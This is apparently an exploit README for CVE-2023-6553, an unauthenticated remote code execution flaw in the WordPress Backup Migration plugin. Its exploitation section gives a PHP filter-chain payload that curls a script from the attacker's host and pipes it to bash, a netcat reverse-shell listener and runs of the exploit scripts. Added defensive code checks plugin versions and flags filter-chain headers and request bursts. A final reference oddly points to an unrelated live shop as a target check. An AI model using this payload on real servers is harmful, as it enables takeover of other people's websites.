## https://sploitus.com/exploit?id=E4255C6C-135B-52C2-A15A-80F5F4A7EA47
# CVE-2023-6553
Exploit development for CVE-2023-6553 in the Backup plugin for WordPress.

This is a critical CVE with a CVSS score of 9.8.

The vulnerability allows an attacker to execute commands on the server running a vulnerable version of the plugin.

Vulnerable versions: Backup <= 1.3.7
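A defender's first check for this issue is whether an installed copy falls in the vulnerable range. The following is an added example, not code from this repository: it reads the `Version:` line from a WordPress plugin header and compares it against the 1.3.7 ceiling stated above, using a numeric comparison so that a release such as `1.3.10` is not mistaken for an older one than `1.3.7`. The sample header is constructed, and the file layout scanned by `audit_plugin_dir` (top-level `.php` files inside the plugin directory) is an assumption.

```python
from __future__ import annotations

import re
import sys
from pathlib import Path

# Last vulnerable release per this page's "Vulnerable versions" line (Backup <= 1.3.7).
LAST_VULNERABLE = "1.3.7"

# Constructed sample of a WordPress plugin header (not the real plugin file); the
# "Version:" line is the field WordPress itself reads to show the installed version.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Backup Migration
 * Version: 1.3.6
 */
"""

VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([^\r\n]+)", re.IGNORECASE | re.MULTILINE)


def parse_version(v: str) -> tuple:
    """'1.3.7' -> (1, 3, 7); a non-numeric tail such as '7-beta' counts as 7."""
    parts = []
    for piece in v.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def compare_versions(a: str, b: str) -> int:
    """Classic comparator (-1, 0, 1). Short versions are zero-padded so that
    '1.3' compares equal to '1.3.0' instead of sorting below it."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return (pa > pb) - (pa < pb)


def plugin_version_from_header(text: str):
    """Return the Version: value from a plugin header, or None if absent."""
    m = VERSION_RE.search(text)
    return m.group(1).strip() if m else None


def is_vulnerable(version: str) -> bool:
    return compare_versions(version, LAST_VULNERABLE) <= 0


def audit_plugin_dir(plugin_dir: Path) -> dict:
    """Assumption: the plugin header lives in a top-level PHP file of the installed
    plugin directory (e.g. wp-content/plugins/backup-backup). Report the verdict."""
    for php_file in sorted(plugin_dir.glob("*.php")):
        version = plugin_version_from_header(php_file.read_text(errors="replace"))
        if version:
            return {"file": php_file.name, "version": version, "vulnerable": is_vulnerable(version)}
    return {"file": None, "version": None, "vulnerable": None}


if __name__ == "__main__":
    v = plugin_version_from_header(SAMPLE_HEADER)
    print(f"sample header version {v}: vulnerable={is_vulnerable(v)}")
    if len(sys.argv) > 1:
        # Usage: python3 check_version.py /var/www/html/wp-content/plugins/backup-backup
        print(audit_plugin_dir(Path(sys.argv[1])))
```

Run it with the plugin directory as the only argument; with no argument it evaluates the constructed sample header.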

## Set up

1) Clone this repository with `git clone`.

2) Run the command below to start the Docker containers:
```
docker-compose up -d
```
You should see two containers running:
- WordPress
- SQL database

3) You can now browse to the WordPress site on the IP address of the Docker container; it is also reachable at
```
http://localhost:8000/
```

4) To download the vulnerable version of the backup plugin, run:
```
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
```

5) Log in to the WordPress site using the link from step 3 and install the plugin zip downloaded in the previous step.

## Exploitation

1) Start a listener on port 9000 to receive the callback when the exploit runs (the module listens on port 8000 unless the port is given explicitly):
```
python3 -m http.server 9000
```

2) Run the Go script with the following command:
```
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
```

3) You will get the following error:
```
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>
```

This happens because, after the filter-chain conversions, the size of the request header exceeds what the server allows.

4) So instead we break the command into chunks, write them to a file on the remote server and then execute that file. Before that, start a listener to catch the reverse shell:
```
nc -nlvp 8080
```
Then run the exploit against the vulnerable plugin:

```
python3 final_exploit.py
```

5) You should have a reverse shell at this point.


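From the defender's side, the failure mode described above (a filter chain large enough to trip the web server's header-size limit, followed by a payload delivered as many small requests) leaves observable traces in request headers and request timing. The following is an added example, not code from this repository, that runs three simple detection heuristics over constructed request records with their headers, as a reverse proxy or WAF audit log might export them: filter-chain indicators in a header value, unusually long header values, and bursts of requests from one client to the plugin directory. The event format, the `some-endpoint.php` path, the thresholds and the sample IP addresses are all assumptions; only the `backup-backup` plugin slug comes from the wordpress.org link in the references.

```python
from __future__ import annotations

import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators of a PHP filter chain in a header value (see the Synacktiv write-up in the references).
FILTER_CHAIN_PATTERNS = [
    re.compile(r"php://filter", re.I),
    re.compile(r"convert\.iconv\.", re.I),
    re.compile(r"convert\.base64-(?:en|de)code", re.I),
]
LONG_HEADER_BYTES = 4096          # heuristic threshold: ordinary browser headers are far smaller
PLUGIN_PATH_PREFIX = "/wp-content/plugins/backup-backup/"   # plugin slug from the wordpress.org URL
BURST_WINDOW_S = 60               # chunked writes arrive as many requests in a short window
BURST_COUNT = 10


def constructed_sample() -> str:
    """Constructed JSON-lines events (one request per line, headers included). Not real traffic."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    endpoint = PLUGIN_PATH_PREFIX + "some-endpoint.php"   # constructed path, not the plugin's real file
    rows = [
        {"ts": base.isoformat(), "src": "203.0.113.10", "path": "/wp-login.php",
         "headers": {"User-Agent": "Mozilla/5.0"}},
        {"ts": (base + timedelta(seconds=5)).isoformat(), "src": "198.51.100.7", "path": endpoint,
         "headers": {"X-Constructed": "php://filter/convert.base64-decode/resource=php://temp"}},
        {"ts": (base + timedelta(seconds=9)).isoformat(), "src": "198.51.100.7", "path": endpoint,
         "headers": {"X-Constructed": "A" * 5000}},
    ]
    for i in range(12):   # one client hitting the plugin path twelve times in twelve seconds
        rows.append({"ts": (base + timedelta(seconds=20 + i)).isoformat(), "src": "192.0.2.5",
                     "path": endpoint, "headers": {"User-Agent": "curl/8.0"}})
    return "\n".join(json.dumps(r) for r in rows)


def parse_events(jsonl: str) -> list:
    events = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"])
            events.append(ev)
    return events


def header_findings(ev: dict) -> list:
    """Return (kind, header_name) for each suspicious header on one request."""
    out = []
    for name, value in ev.get("headers", {}).items():
        if any(p.search(value) for p in FILTER_CHAIN_PATTERNS):
            out.append(("filter_chain", name))
        elif len(value.encode("utf-8", "replace")) > LONG_HEADER_BYTES:
            out.append(("long_header", name))
    return out


def analyze(events: list) -> list:
    findings = []
    plugin_hits = defaultdict(list)   # src -> timestamps of requests under the plugin directory
    for ev in events:
        for kind, hdr in header_findings(ev):
            findings.append({"kind": kind, "src": ev["src"], "path": ev["path"], "header": hdr})
        if ev["path"].startswith(PLUGIN_PATH_PREFIX):
            plugin_hits[ev["src"]].append(ev["ts"])
    # Sliding window over each client's requests to the plugin directory.
    for src, times in plugin_hits.items():
        times.sort()
        lo = 0
        for hi in range(len(times)):
            while (times[hi] - times[lo]).total_seconds() > BURST_WINDOW_S:
                lo += 1
            if hi - lo + 1 >= BURST_COUNT:
                findings.append({"kind": "burst", "src": src, "count": hi - lo + 1,
                                 "path": PLUGIN_PATH_PREFIX})
                break
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_events(constructed_sample())):
        print(finding)
```

The long-header rule is the cheapest of the three to deploy, since a web server that already returns 400 for oversized header fields (as Apache does above) can simply log those rejections; the burst rule needs per-client state and should be tuned against normal admin traffic to the plugin before alerting on it.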
## References
- https://patchstack.com/articles/test-wordpress-plugin-security/
- https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
- https://wordpress.org/plugins/backup-backup/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
- https://plugins.trac.wordpress.org/browser/backup-backup/
- https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
- https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it
- How easy it is to check whether a vulnerable version of the plugin is present on a WordPress site: https://www.thetraveloutlier.com/shop/